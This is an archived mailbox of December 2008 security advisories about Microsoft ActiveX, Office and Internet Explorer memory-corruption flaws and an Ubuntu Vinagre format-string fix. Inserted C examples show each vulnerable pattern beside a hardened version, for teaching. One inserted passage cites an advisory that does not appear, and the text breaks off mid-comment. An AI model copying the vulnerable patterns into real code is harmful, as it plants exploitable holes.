Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJPtoebjs6HoxIfBkRAnGcAJ95DE6l5oW0CL7joxrUpQpJEFaJkACgx06g
YVieB4+qBtOPh69TdEd7j8Y=TC3Z
-----END PGP SIGNATURE-----

From - Tue Dec  9 16:29:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f82
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38877-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 060B4EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:24:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 11A6B1438C1; Tue,  9 Dec 2008 12:46:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27689 invoked from network); 9 Dec 2008 20:04:21 -0000
Date: Tue, 9 Dec 2008 21:17:03 +0100
Message-Id: <200812092017.mB9KH3wQ005586@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Hierarchical FlexGrid Control Integer Overflows
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 09/12/2008

     - Microsoft Hierarchical FlexGrid Control Integer Overflows -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

=====================================================================
1) Affected Software

* Microsoft Hierarchical FlexGrid Control 6.0.88.4

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================
3) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in Microsoft
Hierarchical FlexGrid Control bundled with various products, which can
be exploited by malicious people to compromise a user's system.

The vulnerabilities are caused by integer overflow errors in the
ActiveX control (mshflxgd.ocx) when handling the "Rows" and "Cols"
properties and the "ExpandAll()" and "CollapseAll()" methods. These
can be exploited to corrupt memory.

Successful exploitation allows execution of arbitrary code.
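Both the GDI buffer-length overflow in the iDefense advisory above and the FlexGrid "Rows"/"Cols" overflows described here are the same bug class: a size is computed as a product in 32-bit arithmetic, the product wraps, and an allocation far smaller than the data later written into it is made. The C program below is an added illustration of that class, not code from either advisory, from GDI or from mshflxgd.ocx; the function names and the row/column/element sizes are constructed for this example. It shows the naive computation next to a checked one that refuses any request whose exact size does not fit.

```c
#include <stdint.h>
#include <stdio.h>

/* Naive length computation as a 32-bit product. With large dimensions the
 * multiplication wraps, and the allocation that follows is much smaller
 * than the rows*cols*elem_size bytes the parser will later copy into it. */
uint32_t naive_buffer_len(uint32_t rows, uint32_t cols, uint32_t elem_size)
{
    return rows * cols * elem_size;
}

/* Returns 1 if rows*cols*elem_size cannot be represented in 32 bits.
 * Each step checks the next factor against the remaining headroom, so
 * no intermediate product ever wraps. */
int buffer_len_overflows(uint32_t rows, uint32_t cols, uint32_t elem_size)
{
    if (rows == 0 || cols == 0 || elem_size == 0)
        return 0;                       /* a zero product cannot overflow */
    if (rows > UINT32_MAX / cols)
        return 1;
    uint32_t cells = rows * cols;       /* safe: checked above */
    if (cells > UINT32_MAX / elem_size)
        return 1;
    return 0;
}

/* Checked version: returns the exact size, or 0 to signal that the request
 * must be rejected (an empty image/grid is rejected as well, so a caller
 * never allocates 0 bytes and then writes into the result). */
uint32_t checked_buffer_len(uint32_t rows, uint32_t cols, uint32_t elem_size)
{
    if (rows == 0 || cols == 0 || elem_size == 0)
        return 0;
    if (buffer_len_overflows(rows, cols, elem_size))
        return 0;
    return rows * cols * elem_size;
}

/* How many bytes a copy of the real payload would run past the naive
 * allocation. elem_size is assumed small (pixel or cell bytes), so the
 * 64-bit product itself does not wrap for the inputs used here. */
uint64_t overrun_bytes(uint32_t rows, uint32_t cols, uint32_t elem_size)
{
    uint64_t true_len = (uint64_t)rows * cols * elem_size;
    return true_len - naive_buffer_len(rows, cols, elem_size);
}

int main(void)
{
    /* constructed sample: a 65537 x 65536 grid of 1-byte cells */
    uint32_t rows = 0x10001, cols = 0x10000, elem = 1;
    printf("naive length: %u bytes\n", naive_buffer_len(rows, cols, elem));
    printf("overflows: %d, checked length: %u, overrun if trusted: %llu bytes\n",
           buffer_len_overflows(rows, cols, elem),
           checked_buffer_len(rows, cols, elem),
           (unsigned long long)overrun_bytes(rows, cols, elem));
    return 0;
}
```

For the sample grid the naive computation yields a 64 KiB allocation for a 4 GiB payload, which is the undersized-heap-buffer condition both advisories describe; the checked variant returns 0 and the caller rejects the input before any allocation takes place.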

=====================================================================
4) Solution

Apply patches from MS08-070.

=====================================================================
5) Time Table

28/08/2007 - Vendor notified.
28/08/2007 - Vendor response.
26/09/2007 - Additional information provided and status update 
             requested.
26/09/2007 - Vendor informs that status update will be provided soon.
10/10/2007 - Vendor provides status update.
23/11/2007 - Status update requested.
24/11/2007 - Vendor provides status update.
15/08/2008 - Status update requested.
09/09/2008 - Status update requested.
26/09/2008 - Status update requested and vendor informed that 
             advisory will be published in a week if no status update
             is provided.
29/09/2008 - Vendor provides status update.
31/10/2008 - Vendor provides status update (targeted for November).
07/11/2008 - Vendor provides status update (targeted for December).
05/12/2008 - Vendor provides status update (on track for December).
09/12/2008 - Vendor acknowledges that fix will be issued today.
09/12/2008 - Vendor publishes security bulletin.
09/12/2008 - Public disclosure.

=====================================================================
6) Credits

Discovered by Carsten Eiram, Secunia Research.

=====================================================================
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4254 for the vulnerability.

MS08-070 (KB932349):
http://www.microsoft.com/technet/security/Bulletin/MS08-070.mspx

=====================================================================
8) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-72/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Dec  9 16:39:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f83
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38879-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5D15CEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:33:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C80D7236F69; Tue,  9 Dec 2008 14:08:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29315 invoked from network); 9 Dec 2008 20:50:36 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-083: Microsoft Animation ActiveX Control Malformed AVI Parsing Code
 Execution Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF4203AD0F.2664922A-ON8825751A.0073FAA8-8625751A.007408B8@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:07:25 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:07:28 PM,
Serialize complete at 12/09/2008 01:07:28 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   
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From - Tue Dec  9 16:49:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f85
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38880-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id AC143EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:43:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 935AD236FD1; Tue,  9 Dec 2008 14:08:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29393 invoked from network); 9 Dec 2008 20:51:28 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-084: Microsoft Office RTF Consecutive Drawing Object Parsing Heap
 Corruption Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF1EE0C28F.9DA28F3B-ON8825751A.007415CE-8625751A.00741E35@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:08:20 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:08:24 PM,
Serialize complete at 12/09/2008 01:08:24 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   
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From - Tue Dec  9 16:59:51 2008
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-085: Microsoft Office RTF Drawing Object Heap Overflow Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF057B75F9.D7D30BB6-ON8825751A.007429F7-8625751A.00743B6D@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:09:35 -0600
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
From - Tue Dec  9 17:09:51 2008
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-086: Microsoft Office Word Document Table Property Stack Overflow
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF750300E4.75257F3E-ON8825751A.00744240-8625751A.00744B12@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:10:15 -0600
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64

ZDI-08-086: Microsoft Office Word Document Table Property Stack Overflow
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-086
December 9, 2008

-- CVE ID:
CVE-2008-4837

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Word

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office Word. Exploitation requires
that the attacker coerce the target into opening a malicious .DOC file.

The specific flaw exists when processing a malformed table property
within a Microsoft Word document. User-supplied data is copied into a
stack-based buffer using a size that is calculated from the contents of
the property. Exploitation can result in arbitrary code execution under
the context of the current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS08-072.mspx

-- Disclosure Timeline:
2008-08-19 - Vulnerability reported to vendor
2008-12-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * wushi&ling of team509

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster@3com.com.
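The ZDI-08-086 advisory above describes the bug class only in one sentence: a copy into a stack buffer whose length is computed from file contents. The following C example is added here to make that concrete and is not Microsoft's code, nor does it model the real .DOC table-property layout. The record format (one length byte followed by payload), PROP_BUF_SIZE and all function names are constructed for illustration; the point is the pair of checks that a parser must make before trusting a length field taken from the document.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not Microsoft's code and not the real .DOC structure.
 * It models the bug class in ZDI-08-086: a length taken from the file
 * drives a copy into a fixed-size stack buffer. The record layout here
 * is constructed for illustration: one length byte followed by payload. */

#define PROP_BUF_SIZE 32   /* constructed fixed-size stack buffer */

/* Vulnerable shape (do not do this): the copy length comes straight from
 * the document and is never compared with the destination or the input.
 *
 *     uint8_t buf[PROP_BUF_SIZE];
 *     size_t len = data[0];
 *     memcpy(buf, data + 1, len);     // len up to 255 > 32: stack smash
 */

/* Hardened parser: returns the number of payload bytes copied into out,
 * or -1 if the record is malformed. The length is checked against both
 * the destination capacity and the bytes actually present in the input,
 * so a lying length field is rejected instead of trusted. */
int parse_property(const uint8_t *data, size_t datalen,
                   uint8_t *out, size_t outlen)
{
    if (data == NULL || datalen < 1)
        return -1;                        /* no length byte at all */
    size_t len = data[0];
    if (len > outlen)
        return -1;                        /* would overflow destination */
    if (len > datalen - 1)
        return -1;                        /* claims more bytes than exist */
    memcpy(out, data + 1, len);
    return (int)len;
}

/* Caller that keeps the buffer on the stack, as in the advisory, but only
 * ever fills it through the checked parser. Returns bytes accepted, or -1. */
int load_property_to_stack(const uint8_t *data, size_t datalen)
{
    uint8_t buf[PROP_BUF_SIZE];
    memset(buf, 0, sizeof buf);           /* no uninitialized residue */
    return parse_property(data, datalen, buf, sizeof buf);
}

int main(void)
{
    /* constructed records: a valid one, an oversized length, a truncated one */
    uint8_t good[]      = { 4, 'a', 'b', 'c', 'd' };
    uint8_t oversized[] = { 200, 'x', 'y' };
    uint8_t truncated[] = { 10, 'x', 'y' };
    printf("good: %d\n", load_property_to_stack(good, sizeof good));
    printf("oversized: %d\n", load_property_to_stack(oversized, sizeof oversized));
    printf("truncated: %d\n", load_property_to_stack(truncated, sizeof truncated));
    return 0;
}
```

The second check (length versus remaining input) matters as much as the first: a length that fits the buffer but exceeds the file would otherwise read past the end of the mapped document, which is the over-read counterpart of the overflow in the advisory.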
From - Tue Dec  9 17:19:51 2008
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-087: Microsoft Internet Explorer Webdav Request Parsing Heap
 Corruption Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF6DCC3A97.5FC40CF4-ON8825751A.00745288-8625751A.00745A4A@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:10:54 -0600
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
From - Wed Dec 10 11:39:51 2008
From: "Brett Moore" <brett.moore@insomniasec.com>
To: <bugtraq@securityfocus.com>
Subject: Insomnia : ISVA-081209.1 - IE Webdav Request Parsing Heap Corruption Vulnerability
Date: Wed, 10 Dec 2008 12:32:12 +1300
Message-ID: <009901c95a56$6032f790$2098e6b0$@moore@insomniasec.com>
MIME-Version: 1.0
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AclaVlxz34usP9eKQ8C9as4A21yuzQ==
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Language: en-nz

__________________________________________________________________

 Insomnia Security Vulnerability Advisory: ISVA-081209.1
___________________________________________________________________

 Name: IE Webdav Request Parsing Heap Corruption Vulnerability 
 Released: 09 December 2008
  
 Vendor Link: 
    http://www.microsoft.com/
  
 Affected Products:
    Microsoft Internet Explorer 7 Running On Vista
    Requires Office 2007
 
 Original Advisory: 
    http://www.insomniasec.com/advisories/ISVA-081209.1.htm
 
 Researcher: 
    Brett Moore, Insomnia Security
    http://www.insomniasec.com
___________________________________________________________________

_______________

 Description
_______________

A vulnerability was found in the way that webdav requests are
cached and then later retrieved by Internet Explorer. This results
in the use of uninitialized memory which, under the right circumstances,
can lead to command execution.

_______________

 Details
_______________

When Internet Explorer loads a file from a webdav share, a copy of
the file is stored in

\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

This copy is used as the cached version of the file, and is loaded 
if a page refresh is done.

If the size of the requested file is larger than 190 characters, then
the webdav handling service will not save it correctly.

Internet Explorer assumes that the file was stored, and is cached, so
when a refresh is done it attempts to load the file information from
the cached data.

This leads to heap corruption, with various values read from the
uninitialized data that lead to exploitable conditions.

_______________

 Solution
_______________

Microsoft has released a security update to address this issue:
http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx

_______________

 Legals
_______________

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___________________________________________________________________
 
Insomnia Security Vulnerability Advisory: ISVA-081209.1
___________________________________________________________________
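The failure mode in the Insomnia advisory above is a state mismatch: the cache write fails for over-long names, the consumer marks the entry as cached anyway, and the refresh path then reads memory that was never filled. The C example below is added here to show that pattern and its fix; it is not Internet Explorer's or the WebDAV redirector's code. The cache_entry layout, NAME_LIMIT, DATA_SIZE and all function names are constructed for illustration (the 190-character figure is the advisory's). The entry is zeroed in both variants so the demonstration is deterministic; in the advisory the memory was uninitialized, which is worse.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not Internet Explorer's or the WebDAV redirector's code.
 * It models the failure mode in ISVA-081209.1: the backing store rejects
 * an over-long name, the caller marks the entry cached anyway, and a later
 * refresh serves whatever the entry holds. Layout and names are constructed. */

#define NAME_LIMIT 190      /* the advisory's figure, used as a constructed limit */
#define DATA_SIZE  64

struct cache_entry {
    char name[NAME_LIMIT + 1];
    unsigned char data[DATA_SIZE];
    size_t datalen;
    int valid;              /* must be set only after the store succeeded */
};

/* Backing store that fails for over-long names or oversized payloads.
 * Returns 0 on success, -1 on failure. This is the step that the advisory
 * says silently fails for long names. */
static int store_file(struct cache_entry *e, const char *name,
                      const unsigned char *data, size_t datalen)
{
    if (strlen(name) > NAME_LIMIT || datalen > DATA_SIZE)
        return -1;
    strcpy(e->name, name);
    memcpy(e->data, data, datalen);
    e->datalen = datalen;
    return 0;
}

/* Vulnerable shape: the return value of the store is ignored and the entry
 * is marked cached regardless, so a refresh trusts an entry that was never
 * written. Zeroed here only to keep the demo deterministic. */
int cache_put_unchecked(struct cache_entry *e, const char *name,
                        const unsigned char *data, size_t datalen)
{
    memset(e, 0, sizeof *e);
    store_file(e, name, data, datalen);   /* result ignored: the bug */
    e->valid = 1;
    return 0;
}

/* Hardened form: zero the entry so nothing stale can be read, and mark it
 * valid only when the store reports success. Returns 0 or -1. */
int cache_put(struct cache_entry *e, const char *name,
              const unsigned char *data, size_t datalen)
{
    memset(e, 0, sizeof *e);
    if (store_file(e, name, data, datalen) != 0)
        return -1;          /* valid stays 0: a refresh must re-fetch, not read garbage */
    e->valid = 1;
    return 0;
}

/* Refresh path: serve only entries whose write was confirmed.
 * Returns the cached length, or -1 when there is nothing valid to serve. */
long cache_get(const struct cache_entry *e, unsigned char *out, size_t outlen)
{
    if (!e->valid || e->datalen > outlen)
        return -1;
    memcpy(out, e->data, e->datalen);
    return (long)e->datalen;
}

int main(void)
{
    struct cache_entry e;
    unsigned char out[DATA_SIZE];
    unsigned char payload[] = "hello";          /* constructed file content */
    char longname[NAME_LIMIT + 11];             /* 200 characters, over the limit */
    memset(longname, 'a', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    cache_put_unchecked(&e, longname, payload, 5);
    printf("unchecked: valid=%d served=%ld bytes\n", e.valid, cache_get(&e, out, sizeof out));
    printf("checked:   put=%d served=%ld\n", cache_put(&e, longname, payload, 5),
           cache_get(&e, out, sizeof out));
    return 0;
}
```

The unchecked variant reports a "cached" entry and serves zero bytes of content for the long name, which is the inconsistent state the advisory describes; the checked variant refuses to mark the entry valid, so the refresh falls back to fetching the file again.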

From - Wed Dec 10 11:49:51 2008
Date: Tue, 9 Dec 2008 18:33:32 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: full-dislcosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: ISOI 6, Dallas, TX - January 29, 30
Message-ID: <alpine.DEB.0.999999.0812091832520.15013@linuxbox.org>
User-Agent: Alpine 0.999999 (DEB 847 2007-12-06)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed

Hi all. ISOI is once again happening, and back to the States.

Almost final agenda: http://isotf.org/isoi6.html

As usual, while attendance is limited to the folks who are busy "saving the 
Internet"/"fighting crime", it is free of charge.

Once again we offer the public at-large the opportunity to attend without such 
membership. The process is: you submit a relevant talk, get vetted and get 
accepted. We have two slots reserved for such a purpose.

Subjects of interest: case studies, attacks, botnets, fraud, ...
To submit email your talk idea to contact@isotf.org.

Is it time to say merry Xmas yet?

  Gadi.

From - Wed Dec 10 11:59:52 2008
Date: Tue, 9 Dec 2008 16:37:07 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-689-1] Vinagre vulnerability
Message-ID: <20081210003707.GD25309@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="/9ZOS6odDaRI+0hI"
Content-Disposition: inline
Organization: Ubuntu


--/9ZOS6odDaRI+0hI
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

===========================================================
Ubuntu Security Notice USN-689-1          December 10, 2008
vinagre vulnerability
https://launchpad.net/bugs/305623
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  vinagre                         0.5.1-0ubuntu1.1

Ubuntu 8.10:
  vinagre                         2.24.1-0ubuntu1.1

After a standard system upgrade you need to restart Vinagre to effect
the necessary changes.

Details follow:

Alfredo Ortega discovered a flaw in Vinagre's use of format strings. A
remote attacker could exploit this vulnerability if they tricked a user
into connecting to a malicious VNC server, or opening a specially crafted
URI with Vinagre. In Ubuntu 8.04, it was possible to execute arbitrary
code with user privileges. In Ubuntu 8.10, Vinagre would simply abort,
leading to a denial of service.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1.diff.gz
      Size/MD5:     3366 e37fbea9a3ab1fff84daf49c6aaea8dc
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1.dsc
      Size/MD5:     1246 ade1709a2ee6d44b61310db3c4a23fda
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1.orig.tar.gz
      Size/MD5:  1213849 3d3bc73db7f86286b000906be52aaaa6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_amd64.deb
      Size/MD5:   686380 0aa6d17d90e44908e9744ec4869d23af

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_i386.deb
      Size/MD5:   683658 a8fbd34a10ee2b48b0ba6653bb2f4f65

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_lpia.deb
      Size/MD5:   683584 a74f68064ff76e5ad23dd0b37c67144b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_powerpc.deb
      Size/MD5:   689330 27586485bdc704afc321a2d1c96a8b74

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_sparc.deb
      Size/MD5:   684872 2050931666716fd8aff124ad57508de8

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1.diff.gz
      Size/MD5:     5844 643dc942b5a60b89da65b1920f9e79c9
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1.dsc
      Size/MD5:     1833 f10ff1d6faa1c4ae67c7cc625918d7b8
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1.orig.tar.gz
      Size/MD5:  1519850 d3d421b9d3e76918cf447e00e2ff4aed

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_amd64.deb
      Size/MD5:  1003668 c3f8746326c23f534d1cb614c3cb9703

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_i386.deb
      Size/MD5:   994708 925bed98ce092088dc6bd90129cc2c3a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_lpia.deb
      Size/MD5:   994026 676aee4fd2e784a38af268e7e86e782f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_powerpc.deb
      Size/MD5:  1002480 818e5f672cc5d23822e1fdc16e438338

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_sparc.deb
      Size/MD5:   998266 2448af1f4c0e05f554d313a0edbcb997
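USN-689-1 above names the bug class (a format string reached by a server-supplied string or a crafted URI) without showing it. The C example below is added here to show the vulnerable shape beside the hardened one and a data-side check; it is not Vinagre's code. The message text, render_status and count_format_directives are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not Vinagre's code. It shows the bug class named in
 * USN-689-1 (an attacker-chosen string reaching a printf-family function
 * as the format argument) next to the hardened form. The message text and
 * helper names are constructed for illustration. */

/* Vulnerable shape (do not do this): the server-supplied string is the
 * format, so "%x" directives read the caller's stack and "%n" writes to it.
 *
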